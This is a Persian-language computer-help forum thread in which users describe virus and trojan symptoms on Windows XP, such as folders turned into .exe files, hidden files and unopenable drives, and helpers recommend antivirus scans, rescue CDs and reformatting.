هر چی ÷وشه ی عکس دارم هست ولی توشون خالی شده. این اون ÷وشه هاییه که رفتم توش. ولی اونایی رو که نرفتم هم بعد اتقال دادم رو یه کام÷یتور دیگه از کلی عکس تو هر ÷وشه فقط 5 یا 6 تا عکس مونده. می ترسم بقیه ی ÷وشه هامو باز کنم. کل ÷وشه های صوت و متن و فیلممو با فلش انتقال دادم به یه کام÷یوتر دیگه ولی یکی از صوتای انتقالی را حواسم نبود باز کردم. الان همین بلا سر اون کام÷یوتر هم اومده و نصف بیشتر عکساش نابود شدن. راستی تو ین کام÷یوتر یه بار ÷یام dont send با این عنوان اومد:pavsrv.exe
نمی دونم به ویرسه ربط داره یا نه. یه مشکل دیگه اینه که آخه من سایتی نرفتم که, یه دونه یاهو و همین ÷ی سی ورلد و سایت دانشگاه. یعنی یه جورایی مطمئنم که از اینترنت برام ویروس نیومده. ارتباط با کام÷یوتر دیگه هم فقط یه دونه فلشمو چند روز ÷یش به کام÷یوتر دوستم زدم که اونم خودش که می گه کام÷یوترم هیچ مشکلی نداره و هیچ ویروسی نداره.
الانم کل مطالب کام÷یوترمو زدم رو سی دی و فلش و دوباره ویندوز نصب کردم. ولی کل این مطالبو می خوام. از طرفی هم می ترسم که اونا رو وارد کام÷یوتر کنمو دوباره این مشکل برام ÷یش بیاد.
راستی من داشتم با بلوتوث و عکسای انتقالی از موبایل ور می رفتم که این بلا سرم اومد.
خواهش می کنم کمکم کنید! راستی من به مطالبی که رو سی دی وفلش زدم نیاز فوری دارم. خواهشا هر چی زودتر هر کی می تونه کمکم کنه.
ممنونم.

سلام دوست من

من به طور کامل متوجه مشکل شما نشدم اگر کل هاردتان را فورمت کرده اید و ویندوز تازه نصب کرده اید و پوشه های

حاوی عکس و... اکنون روی کامپیوترتان نیستند باید سیستمتان پاک باشد و اگر آن پوشه ها روی CD یا فلش

مموری قرار دارند می توانید یک آنتی ویروس درست و حسابی ( من کاسپرسکی را پیشنهاد می کنم ) را نصب و بعد

حتما آن را آپدیت کنید و قبل از ریختن فایلهای روی سی دی یا فلش انها را اسکن کنید تا اگر ویروسی بود پیدا کند .

اگر منظور شما را درست متوجه نشده ام اینبار کمی دقیقتر توضیح دهید .

احتمالا تروجان Brontok است این برنامه را داونلود کن و روی سیستمت اجرا کن تا تروجان را پاک کند :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اگر مشکلت حل نشد بگو تا چاره دیگری بکنیم.
ممنون
من امروز با avg 7.1 حدود 130 ویروس رو پیدا کردم وپاک کردم
ببینم این چی میشه

آقا میشه یکی یه برنامه معرفی کنه که منو از دست exe شدن پوشه ها نجات بده ؟
رو هر پوشه ای که کلید میکنم تبدیل به exe میشه !

با سلام و تشکر از Vtn54
شما کاملا متوجه شده اید مشکل من چیست. و ممنون از راهنماییتان.
ولی من کاس÷راسکی را از کجا گیر بیارم؟ فقط می تونم بخرم یا راه بهتری برای این که سریع و ارزون به دستش بیارم هست؟
بعد منظور از آ÷دیت چیه؟ یعنی کانکت بشم و بعد چه جوری؟!
یه چیز دیگه این که امکان داره کاس÷رسکی نتونه ویروسو ÷یدا کنه؟
ممنونم.

با سلام و تشکر از Vtn54
شما کاملا متوجه شده اید مشکل من چیست. و ممنون از راهنماییتان.
ولی من کاس÷راسکی را از کجا گیر بیارم؟ فقط می تونم بخرم یا راه بهتری برای این که سریع و ارزون به دستش بیارم هست؟
بعد منظور از آ÷دیت چیه؟ یعنی کانکت بشم و بعد چه جوری؟!
یه چیز دیگه این که امکان داره کاس÷رسکی نتونه ویروسو ÷یدا کنه؟
ممنونم.

بهترین راه داونلود آخرین نسخه آن می باشد اگر خودتان به اینترنت دسترسی ندارید می توانید از یکی از این

کافی شاپهایی که اینترنت پرسرعت دارند در عرض چند دقیقه آخرین نسخه را ( 7.0.0.125 یا 6.0.2.621 ترجیحا از سایت

خود کاسپرسکی ) داونلود وبعدبا یک فلش مموری یا سی دی به سیستم خودتان منتقل و نصب کنید .برای آپدیت کردن باید

به اینترنت وصل شوید ولی اگر به اینترنت دسترسی ندارید یا آخرین نسخه را از سایت خود کاسپرسکی داونلود کنید یا

آپدیتهای آن را از سایت کاسپرسکی داونلود وبه کامپیوتر خودتان منتقل کنید . و در مورد سوال آخر هم باید خدمتتان عرض

کنم هیچ آنتی ویروسی 100 در صد ویروسها را شناسایی نمی کند ولی اگر قرار باشد ویروس شما را یک آنتی

ویروس شناسایی کند به احتمال زیاد آن آنتی ویروس کاسپرسکی خواهد بود.

کامپیوتر منم شده کمک کنید اگر از انتی ویروس استفاده کنم پوشه ها پاک نمیشه؟ اگر ویندوز عوض کنم چی ؟یکی یه برنامه معرفی کنه که منو از دست exe شدن پوشه ها نجات بده ؟
رو هر پوشه ای که کلید میکنم تبدیل به exe میشه !
__________________

:40: :40: با سلام

می خواستم بگم در کامپیوترم یک ویروسی افتاده که Folder option کامپیوترم را پاک کرده حال می خواستم بپرسم چگونه بدون عوض کردن ویندوزم می توانم بدون هیچ مشکلی آنرا پاک کنم ...:40: :40:

سلام
خسته نباشید

چند روز پیش از این تاریخ به یک تالار روسی رفتم و یه File فشرده با پسوند RAR رو گرفتم. بعد از استخراج کردن اون (Extract) یک File فشرده ی دیگه با پسوند RAR باز شد، اون رو هم استخراج کردم. اما بعد از استخراج اون File مادر RAR غیب شد!!! من تعجب کردم ولی کاری نکردم. دستاگاهم تو حالت Stand by بود و چیزی آشکار خاصی ندیدم. وقتی دستگاه رو خاموش کردم (Turn Off) دیدم که Drive D ی من به حالت پیش از Format دراومده و همش میگه "The disk in drive D is not formatted. Do you want to format it now" به حالت Safe mode رفتم ولی نتونستم کاری بکنم. با اینکه NOD32 و Spy... داشتم ولی هیچ کاری نکردند. این برنامه ها هم تو D بود! Windows رو از نو ریختم بازم Hardم درست نشد.چیزی که بیشتر ناراحت کننده تره اینه که تازه الان هم Fileهای RAR رو که باز می کنم، می پرن، نا پدید میشن، غیب میشن!!!
البته نا گفته نمونه که یک برنامه به نام Folder lock روی Drive D داشتم که چند تا پوشه رو قفل کرده بود!!! شاید از اون باشه نه؟ چون Hard Cleanup نمی تونستم بکنم و می گفت Drveتو نمی تونم بخونم!!!

به شرکت ایمن اسکن زنگ زدم، اونا گفتن ما چنین Virus قدرتمندی نداریم و هزینه ی بازیابی Hardتون هم بین 50 تا فضا تومنه!!! که باهاتون هماهنگی می کنیم!! من هم گفتم ممنون نیاز به هماهنگی نیست!!!

اگه بتونید راهنماییم کنید ممنون می شم. میشه Drive رو ساده برگردوند به سادگی رفتنش!!! یا خرج سنگینی داره؟ برای غیب شدن و پریدن Fileهای RAR چیزی می دونید؟ باید قید دستگاهم رو بزنم؟

چهارشنبه، 13 تیر 1386

:40: :40: با سلام

می خواستم بگم در کامپیوترم یک ویروسی افتاده که Folder option کامپیوترم را پاک کرده حال می خواستم بپرسم چگونه بدون عوض کردن ویندوزم می توانم بدون هیچ مشکلی آنرا پاک کنم ...:40: :40:

احتمالا تروجان Brontok است این برنامه را داونلود کن و روی سیستمت اجرا کن تا تروجان را پاک کند :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اگر مشکلت حل نشد بگو تا چاره دیگری بکنیم.

سلام
خسته نباشید

چند روز پیش از این تاریخ به یک تالار روسی رفتم و یه File فشرده با پسوند RAR رو گرفتم. بعد از استخراج کردن اون (Extract) یک File فشرده ی دیگه با پسوند RAR باز شد، اون رو هم استخراج کردم. اما بعد از استخراج اون File مادر RAR غیب شد!!! من تعجب کردم ولی کاری نکردم. دستاگاهم تو حالت Stand by بود و چیزی آشکار خاصی ندیدم. وقتی دستگاه رو خاموش کردم (Turn Off) دیدم که Drive D ی من به حالت پیش از Format دراومده و همش میگه "The disk in drive D is not formatted. Do you want to format it now" به حالت Safe mode رفتم ولی نتونستم کاری بکنم. با اینکه NOD32 و Spy... داشتم ولی هیچ کاری نکردند. این برنامه ها هم تو D بود! Windows رو از نو ریختم بازم Hardم درست نشد.چیزی که بیشتر ناراحت کننده تره اینه که تازه الان هم Fileهای RAR رو که باز می کنم، می پرن، نا پدید میشن، غیب میشن!!!
البته نا گفته نمونه که یک برنامه به نام Folder lock روی Drive D داشتم که چند تا پوشه رو قفل کرده بود!!! شاید از اون باشه نه؟ چون Hard Cleanup نمی تونستم بکنم و می گفت Drveتو نمی تونم بخونم!!!

به شرکت ایمن اسکن زنگ زدم، اونا گفتن ما چنین Virus قدرتمندی نداریم و هزینه ی بازیابی Hardتون هم بین 50 تا فضا تومنه!!! که باهاتون هماهنگی می کنیم!! من هم گفتم ممنون نیاز به هماهنگی نیست!!!

اگه بتونید راهنماییم کنید ممنون می شم. میشه Drive رو ساده برگردوند به سادگی رفتنش!!! یا خرج سنگینی داره؟ برای غیب شدن و پریدن Fileهای RAR چیزی می دونید؟ باید قید دستگاهم رو بزنم؟

چهارشنبه، 13 تیر 1386

سلام

لینک آن فایلی را که از آن سایت روسی گرفتی برایم بفرست شاید بشود کاری کرد.

آقا میشه یکی یه برنامه معرفی کنه که منو از دست exe شدن پوشه ها نجات بده ؟
رو هر پوشه ای که کلید میکنم تبدیل به exe میشه !



کامپیوتر منم شده کمک کنید اگر از انتی ویروس استفاده کنم پوشه ها پاک نمیشه؟ اگر ویندوز عوض کنم چی ؟یکی یه برنامه معرفی کنه که منو از دست exe شدن پوشه ها نجات بده ؟
رو هر پوشه ای که کلید میکنم تبدیل به exe میشه !
__________________


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام
من يه ويروس دارم كه گزينه Show Hidden را از كار انداخته است و هنگامي كه اين گزينه را فعال ميكنم اتو ماتيك بر داشته مي شود حتي من از داخل ريجستري هم نتوانستم اين مشكل را حل كنم ويروس يابي هم كه استفاده مي كنم مك كافي ورژن 8i هستش آپديت هم شده است.
با تشكر

سلام
لینک آن فایلی را که از آن سایت روسی گرفتی برایم بفرست شاید بشود کاری کرد.

سلام
ممنون از اینکه می خواید کمک کنید، این آدرس اون File اولی هست که غیب شد! البته من نمی دونم که مشکل اون باشه یا نه. چون غیر عادی بود به فکر اون افتادم


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

دیروز به من دوستی گفت که سپاه پاسداران ویروس جدیدی رو به جون کاربرا انداخته!!! شاید من هم یکی از اونام دیگه! چون برام نامه هایی می یاد که میگه یه تصویر هست که باید Load بشه، اما Load نمیشه! البته من دیگه باهاشون کاری ندارم.
به هر حال عزیز من اگه یه سازمان با سرمایه ی بزرگ بخواد یه ویروس مخرب بسازه، چند شرکت مثل Norton, McAfee, NOD32, ... نمی تونن کاری بکنن!!!
اما اگه کمکی از دستتون بر می یاد حتمی بگید. من Driveم رو Format کنم یا درست میشه؟ با این Virus مخفی چه کنم؟ هزینش رو هم می تونم در بزاعتم بدم.

عرضی دیگه داشتم و اون این بود: شما به عنوان یک فرد کاربلد تو این ضمینه ها، چه برنامه ی ضد ویروس و، چه برنامه ی ضد تروجان و Cracker رو پیشنهاد می دید؟

خسته نباشید و خداحافظ
پنجشنبه، 14 تیر 1386

رو سیستم من انتی ویروس نصب هستش حتی اپدیت شده اما من یه فلش مموری دارم که وقتی به کامپیوتر رفیقم متصل می کنم یه ویروس می گیره که من وقتی به کامپیوترم وصل کنم انتی ویروس من فعال میشه و اون ویروس رو از بین میبره ولی با وجود این وقتی رو درایو فلش مموری که ایجاد شده دوبار کلیک می کنم برای باز شدن باز نمیشه و یه صفحه میاد که میگه با کدوم برنامه اجرا کنم و فقط تنها راه دیدن محتویات داخل مموری از طریق اکسپلورر هست و برای این که کلا این مشکل رفع بشه حتما باید با خود برنامه فلش مموری فرمت کنم ولی من که نمیتونم این کار رو هردفعه انجام بدم شاید جایی باشم که سی دی برنامه فلش مموری همراهم نباشه اگه ممکنه یک فکری برای رفع این مشکل کنید

سلام
ممنون از اینکه می خواید کمک کنید، این آدرس اون File اولی هست که غیب شد! البته من نمی دونم که مشکل اون باشه یا نه. چون غیر عادی بود به فکر اون افتادم


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

دیروز به من دوستی گفت که سپاه پاسداران ویروس جدیدی رو به جون کاربرا انداخته!!! شاید من هم یکی از اونام دیگه! چون برام نامه هایی می یاد که میگه یه تصویر هست که باید Load بشه، اما Load نمیشه! البته من دیگه باهاشون کاری ندارم.
به هر حال عزیز من اگه یه سازمان با سرمایه ی بزرگ بخواد یه ویروس مخرب بسازه، چند شرکت مثل Norton, McAfee, NOD32, ... نمی تونن کاری بکنن!!!
اما اگه کمکی از دستتون بر می یاد حتمی بگید. من Driveم رو Format کنم یا درست میشه؟ با این Virus مخفی چه کنم؟ هزینش رو هم می تونم در بزاعتم بدم.

عرضی دیگه داشتم و اون این بود: شما به عنوان یک فرد کاربلد تو این ضمینه ها، چه برنامه ی ضد ویروس و، چه برنامه ی ضد تروجان و Cracker رو پیشنهاد می دید؟

خسته نباشید و خداحافظ
پنجشنبه، 14 تیر 1386

دوست من

این فایلی که لینکش را گذاشته اید اولا یک فایل با پسورد zip است نه rar در ثانی حاوی یکی از تم های برنامه Windows Blind

است نه یک فایل فشرده دیگر .فکر می کنم لینک را اشتباه گذاشته اید. شناخت این ویروس اولین قدم برای پاک

کردن ان است ولی با توجه به شرحی که داده اید ممکن است بازیافت کامل سیستمتان مقدور نباشد و بهترین راه

همان فورمت هارد باشد ولی اگر امکانش مقدور نیست علاوه بر گذاشتن لینک آن فایل من پیشنهاد می کنم آخرین

نسخه کاسپرسکی ( نسخه 7.0.0.125 ) را روی یک سیستم تمیز دیگر نصب کنید و پس از آپدیت آن یک

RescueCD با ان ایجاد کنید و سیستم را با آن بالا بیاورید .علاج قطعی مشکل شما احتمالا همین راه است اگر

سوالی بود در خدمتتان هستم.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

رو سیستم من انتی ویروس نصب هستش حتی اپدیت شده اما من یه فلش مموری دارم که وقتی به کامپیوتر رفیقم متصل می کنم یه ویروس می گیره که من وقتی به کامپیوترم وصل کنم انتی ویروس من فعال میشه و اون ویروس رو از بین میبره ولی با وجود این وقتی رو درایو فلش مموری که ایجاد شده دوبار کلیک می کنم برای باز شدن باز نمیشه و یه صفحه میاد که میگه با کدوم برنامه اجرا کنم و فقط تنها راه دیدن محتویات داخل مموری از طریق اکسپلورر هست و برای این که کلا این مشکل رفع بشه حتما باید با خود برنامه فلش مموری فرمت کنم ولی من که نمیتونم این کار رو هردفعه انجام بدم شاید جایی باشم که سی دی برنامه فلش مموری همراهم نباشه اگه ممکنه یک فکری برای رفع این مشکل کنید

دوست من

بهترین راه نصب یک ضد ویروس روی سیستم دوستتان است :31: ولی برای حل مشکل خودتان در این گونه مواقع

معمولا یک فایل مخفی ( Hidden ) روی فلش مموری است که اگر آن را پاک کنید مشکل حل می شود.

سلام
من يه ويروس دارم كه گزينه Show Hidden را از كار انداخته است و هنگامي كه اين گزينه را فعال ميكنم اتو ماتيك بر داشته مي شود حتي من از داخل ريجستري هم نتوانستم اين مشكل را حل كنم ويروس يابي هم كه استفاده مي كنم مك كافي ورژن 8i هستش آپديت هم شده است.
با تشكر

سری به این لینک بزن ببین مشکلت حل می شود یا نه :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سری به این لینک بزن ببین مشکلت حل می شود یا نه :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
سلام......

متاسفانه منم همین ویروسو دارم....... اما مدیر جان این ویروسی که شما لینکشو دادین تیک گزینه ی Hide Operating system file رو نمیذاره برداریم......... اما این یکی ویروس برعکسه! فقط اجازه ی نشون دادن فایلای مخفی به حالت معمولی رو نمیده!

آخرین آپدیت نورتون نتونست شناسایی کنه......... منم هنوز نتونستم پیداش کنم :happy:........

موفق باشید

سلام......

متاسفانه منم همین ویروسو دارم....... اما مدیر جان این ویروسی که شما لینکشو دادین تیک گزینه ی Hide Operating system file رو نمیذاره برداریم......... اما این یکی ویروس برعکسه! فقط اجازه ی نشون دادن فایلای مخفی به حالت معمولی رو نمیده!

آخرین آپدیت نورتون نتونست شناسایی کنه......... منم هنوز نتونستم پیداش کنم :happy:........

موفق باشید

دوست من

در این گونه موارد امیدی به نورتون نیست کاسپرسکی را نصب کن و با آپدیت کامل در حالت Safe Mode سیستمت را

اسکن کن ببین مشکل از کجا است.یا اگر عجله داری این برنامه فسقلی ولی همه کاره را داونلود کن و روی سیستم اجرا

کن همانطور که می بینی این برنامه می تواند تغییراتی را که ویروس روی سیستمت ایجاد کرده است برگرداند مثلا در این

مورد کافی است روی گزینه Show Hidden Files کلیک کنی و بعد گزینه Enable را بزنی و در صورت لزوم سیستم را

ریستارت کنی.

لینک داونلود برنامه ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دوست من

در این گونه موارد امیدی به نورتون نیست کاسپرسکی را نصب کن و با آپدیت کامل در حالت Safe Mode سیستمت را

اسکن کن ببین مشکل از کجا است.یا اگر عجله داری این برنامه فسقلی ولی همه کاره را داونلود کن و روی سیستم اجرا

کن همانطور که می بینی این برنامه می تواند تغییراتی را که ویروس روی سیستمت ایجاد کرده است برگرداند مثلا در این

مورد کافی است روی گزینه Show Hidden Files کلیک کنی و بعد گزینه Enable را بزنی و در صورت لزوم سیستم را

ریستارت کنی.

لینک داونلود برنامه ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دوست عزيز
اين ويروس در قسمت propertis حالت hidden رو غير فعال ميكنه همچنين حجم فولدر 37 kb ميشه
فكر نميكنم با اين نرم افزاري كه گذاشتي كاري پيش بره
بازم اگه نرم افزاري داشتي برا تست بزار ما ديگه مجبوريم براي درست شدن كامپيوترمون همه اين نرم افزار ها رو امتحان كنيم
ممنون
كيان

دوست عزيز
اين ويروس در قسمت propertis حالت hidden رو غير فعال ميكنه همچنين حجم فولدر 37 kb ميشه
فكر نميكنم با اين نرم افزاري كه گذاشتي كاري پيش بره
بازم اگه نرم افزاري داشتي برا تست بزار ما ديگه مجبوريم براي درست شدن كامپيوترمون همه اين نرم افزار ها رو امتحان كنيم
ممنون
كيان

دوست من

شما این برنامه را امتحان کردید ؟ این برنامه راه حل قطعی نیست و البته در همه موارد موثر نیست ولی فقط 7 کیلوبایت

حجم دارد و نیازی به نصب هم ندارد و در بسیاری از موارد نیز کار شما را راه می اندازد راه حل قطعی نصب یک

آنتی ویروس درست و حسابی و پاک کردن ویروس است .

راه حل قطعی نصب یک آنتی ویروس درست و حسابی و پاک کردن ویروس است .


من رو سيستم ديگه اي kaspersky نصب كردم اما متاسفانه بيشتر فولدر ها از جمله فيلم و موزيك رو كامل از ريشه پاك كرد
اگه قرار بود اين ويروس ياب اينجوري ويروس رو از بين ببره به نظر شما عمل fdisk موثر تر نبود ؟
ممنون
كيان

دوست من

در این گونه موارد امیدی به نورتون نیست کاسپرسکی را نصب کن و با آپدیت کامل در حالت Safe Mode سیستمت را

اسکن کن ببین مشکل از کجا است.یا اگر عجله داری این برنامه فسقلی ولی همه کاره را داونلود کن و روی سیستم اجرا

کن همانطور که می بینی این برنامه می تواند تغییراتی را که ویروس روی سیستمت ایجاد کرده است برگرداند مثلا در این

مورد کافی است روی گزینه Show Hidden Files کلیک کنی و بعد گزینه Enable را بزنی و در صورت لزوم سیستم را

ریستارت کنی.

لینک داونلود برنامه ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
سلام.......

ممنون از لطفت عزیزم :)

شاد باشی :)

من رو سيستم ديگه اي kaspersky نصب كردم اما متاسفانه بيشتر فولدر ها از جمله فيلم و موزيك رو كامل از ريشه پاك كرد
اگه قرار بود اين ويروس ياب اينجوري ويروس رو از بين ببره به نظر شما عمل fdisk موثر تر نبود ؟
ممنون
كيان

به نظر شما استفاده کردن از یک آنتی ویروس خوب و آپدیت شده بر روی سیستم بهتر از عمل fdisk نیست؟

دوست عزیز هم شما هم بقیه میدانید که کسپرسکی این ویروس رو شناسایی میکنه. پس در این صورت چرا

قبل از آلوده شدن سیستمتون از یک آنتی ویروس فعال و آپدیت شده استفاده نمیکردید تا بعدا مجبور نباشید

بعضی از اطلاعاتتون رو از دست بدید.

خیلی از ویروس ها نباید وارد سیستم بشند و هرگز نباید کاری کنیم که راه رو برای فعال شدن ویروس ها و تروجاها

در سیستممون باز کنیم. چون اگر ویروسها قبل از آنتی ویروسها فعال بشند حتی ممکنه که خود آنتی ویروسها رو نیز

از کار بندازند. این یک قانونه و این قانون رو خود شرکت آنتی ویروسها نیز بارها در مقالات و بحث هاشون به کاربران

اینترنتی هشدار دادن که هیچ وقت آنتی ویروستون رو غیر فعال نکنید و همیشه سعی کنید که آنتی ویروسی که

استفاده میکنید آپدیت باشه تا بتونه با تازه ترین و آخرین ویروسهای رایج مقابله بکنه.

اما اگر آنتی ویروس شما فعال و آپدیت شده باشه حتی اگر سخت ترین ویروسها رو هم عمدی فعال کنید نمیتونه

روی سیستم خرابکاری انجام بده. چه برسه به اینکه بخواد آنتی ویروس رو هم از کار بندازه ...

من رو سيستم ديگه اي kaspersky نصب كردم اما متاسفانه بيشتر فولدر ها از جمله فيلم و موزيك رو كامل از ريشه پاك كرد
اگه قرار بود اين ويروس ياب اينجوري ويروس رو از بين ببره به نظر شما عمل fdisk موثر تر نبود ؟
ممنون
كيان

دوست من متاسفانه مشکل شما و بسیاری از دوستان دیگر این است که نحوه عملکرد این گونه ویروسها را نمی دانید .

این دسته از ویروسها فایل یا پوشه های موجود روی دیسک را مخفی ( Hidden یا Super Hidden ) و در بعضی موارد

واقعا Delete می کنند و به جای آن یک نسخه از ویروس را با همان نام فایل یا پوشه پاک شده منتها با یک پسوند دیگر

مانند exe جایگزین می کنند تا کاربر اقدام به پاک کردن آنها نکند .آن فایلهایی را که کاسپرسکی به انها گیر می دهد

فایلهای شما نیستند نسخه های ویروس هستند منتها شما در دامی افتاده اید که ویروس برایتان پهن کرده است برای

برگرداندن فایلها یا پوشه ها اول باید ویروس مزبور و تمام کپی های آن را از روی هارد پاک کنید تا بتوان تغییرات ایجاد شده

توسط ویروس را برگرداند.

سلام به همه برو بچه ها
نمي دونم كه يه ويروس است يا تروجان
وقتي در my computerروي درايوها مي روم و دابل كليك مي كنم درايو را باز نمي كند و پيغام زير را مي دهد .
Run Time error 75
Path/file access erroe
با كاسپر و مك آفي اسكن كردم ولي هيچي نشون نداد .
لطفا كمكم كنيد .
با تشكر

از سیستم ری استور استفاده کن

خيلي ممنون كه كمك كردين
حالا به نظر شما تو همه فولدر هايي كه من رفتم اين ويروس وجود داره (يعني همه فولدرهام پاك ميشه )
اگه من از فايلهام يه كپي رو cd بگيرم بعد ميتونم با كاسپر اونارو clean كنم ؟
ممنون
كيان

خيلي ممنون كه كمك كردين
حالا به نظر شما تو همه فولدر هايي كه من رفتم اين ويروس وجود داره (يعني همه فولدرهام پاك ميشه )
اگه من از فايلهام يه كپي رو cd بگيرم بعد ميتونم با كاسپر اونارو clean كنم ؟
ممنون
كيان

دوست عزیز

من فکر می کنم نتوانستم منظورم را کامل برسانم فایلها یا پوشه هایی که با پسوند exe به جای فایلها و پوشه های

اصلی می بینید فایلهای شما نیستند ویروس هستند و ویروس را نمی توان Clean کرد .فایلهای اصلی شما یا پاک شده اند

( که در این صورت با یک نرم افزار بازیابی اطلاعات پاک شده می توانید آنها را برگردانید ) یا مخفی شده اند که با پاک کردن

ویروس و یا با کمک گرفتن از برنامه های کمکی دوباره پدیدار می شوند.

وقتی که اینترنت کانکت میشود جدیدا زمانی حدود 1-2 دقیقه سیستم هنگ میکنه و بعد صفحات باز میشوند ...

علت چیه ؟( مک آفی و سوپرآنتی اسپای وار هم نصب هست) [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ](17).gif

کدام برنامه باعث هنگ می شود ( بیشترین مقدار CPU یا RAM را اشغال می کند ) ؟
این هم از تصویر task manager چیزی معلومه ؟ ...
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

درمورد تروجان "small.trojan" اطلاعات می خواستم
با سپاس و چرا اینکه کاسپر تشخیص نداد!

وقتی که اینترنت کانکت میشود جدیدا زمانی حدود 1-2 دقیقه سیستم هنگ میکنه و بعد صفحات باز میشوند ...

علت چیه ؟( مک آفی و سوپرآنتی اسپای وار هم نصب هست) [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ](17).gif

این هم از تصویر task manager چیزی معلومه ؟ ...
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دوست من

هیچکدام از پروسه های شما نه حافظه و نه CPU زیادی مصرف نمی کنند .شما از سه وسیله امنیتی ( دو تایی که گفتید

همراه با Boclean استفاده می کنید که ممکن است با هم سازگار نباشند .شما اول بوکلین را آنیستال کن اگر مشکلت

حل نشد مک آفی را هم آنیستال کن به احتمال زیاد مشکل از یکی از این دوتا ناشی می شود.

درمورد تروجان "small.trojan" اطلاعات می خواستم
با سپاس و چرا اینکه کاسپر تشخیص نداد!

دوست من

کاسپرسکی گونه های مختلفی از این تروجان را می شناسد( شاید بیشتر از هر آنتی ویروس دیگری ) شما به این این آدرس

بروید می بینید که کاسپرسکی 8320 گونه مختلف از این تروجان را در دیتابیس خود دارد !

Trojan.win32.Small ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


شما باید اول مشخص کنید اطلاعات مربوط به کدام نوع را می خواهید.

Dear friends
Don kick me out of the forums because of not having written in farsi. the reason is my keyboard doesn't have farsi labels and it takes me hours to type in farsi.
Please guide me with my problem: my computer was full of different viruses but the mcafee could not detect them and i had problem when it turned on so i have installed kaspersky internet security version7
on windows xp but the computer does not work after that
even i can not uninstall it and i don't have access to add and remove programs on control panel. when the computer turns on the message " C:\windows\eksplorasi.exe ( windows can not access to the specified file" appears. I don't know what to do.
:41: Please help

Heyyyyyyyyyyyya
newest version of mcacfee virus scanner doesn't have good power for Clean your system of different variety of viruses .... this is high recommended for system security that install a firewall can support you'r antivirus .... for solve the problem follow these instructions
new release of Norton Antivirus can help you and also this is recommended to install Zone Alarm Profesional as you'r system firewall .... another antivirus that have Good power is Kaspersky Antivirus ... and you can install this for detection malwares .... this is very important notice that you must attention it ... your system maybe have a Kernel Mod Rootkit that don't allow you to gain access to your system components ... for this purpose you can install Sophos Anti Rootkit .... install them and allow scanners scan your system as full scan and also scan you'r system in 3 stage ..... these instructions can helpful and if you'r problem didn't solve you should install a new OS ( windows or linux) for solving problem and report you'r result here ... Good Luck

با سلام در کامپیوتر من تروجانی افتاده من ویندوزم رو پاک کردم و هارد دیسکم رو از اول پارتیشن بندی کردم و دوباره ویندوز رو نصب کردم اما باز این تروجان پاک نشده چون وقتی که وارد ویندوز می شم صفحه ی dekstop و mouse من ظاهر می شه ولی آیکن های دکستاپ وجود ندارند و من باید دکمه های ctrl+Alt+del رو فشار بدهم تا پنجره ی Windows Task Managerظاهر شود بعد وارد تب processes می شم ودر لیست برنامه ها برنامه ی svchost.exe چندین بار تکرار شده من یکی از این svchost.exe را End process می کنم با این کار تمام آیکن ها ظاهر می شود و ویندوز آزاد می شود ولی بعد از گذشت چند دقیقه پنجره ی کوچکی ظاهر می شود که باعث رستارت شدن کامپیوتر می شود
من فکر کنم که این تروجان در هارد من وجود ندارد بلکه در Bootable hard قرار گرفته لطفا من رو در از بین بردن این تروجان یاری کنید

با سلام در کامپیوتر من تروجانی افتاده من ویندوزم رو پاک کردم و هارد دیسکم رو از اول پارتیشن بندی کردم و دوباره ویندوز رو نصب کردم اما باز این تروجان پاک نشده چون وقتی که وارد ویندوز می شم صفحه ی dekstop و mouse من ظاهر می شه ولی آیکن های دکستاپ وجود ندارند و من باید دکمه های ctrl+Alt+del رو فشار بدهم تا پنجره ی Windows Task Managerظاهر شود بعد وارد تب processes می شم ودر لیست برنامه ها برنامه ی svchost.exe چندین بار تکرار شده من یکی از این svchost.exe را End process می کنم با این کار تمام آیکن ها ظاهر می شود و ویندوز آزاد می شود ولی بعد از گذشت چند دقیقه پنجره ی کوچکی ظاهر می شود که باعث رستارت شدن کامپیوتر می شود
من فکر کنم که این تروجان در هارد من وجود ندارد بلکه در Bootable hard قرار گرفته لطفا من رو در از بین بردن این تروجان یاری کنید

دوست عزیز

اگر کل هارد را فورمت کرده باشی و بعد از نصب ویندوز و قبل از نصب هر گونه برنامه دیگری این مشکل به وجود آمده باشد

و سی دی نصب ویندوز هم آلوده نباشد مشکلت از ویروس یا تروجان نیست.هیچ ویروسی از فورمت جان سالم به در

نمی برد .

ببینم کی میتونه دراین مورد کمکم کنه چند وقته هر دفعه به اینترنت وصل میشم این پیغام ظاهر میشه:19:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

ببینم کی میتونه دراین مورد کمکم کنه چند وقته هر دفعه به اینترنت وصل میشم این پیغام ظاهر میشه:19:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دوست عزیز

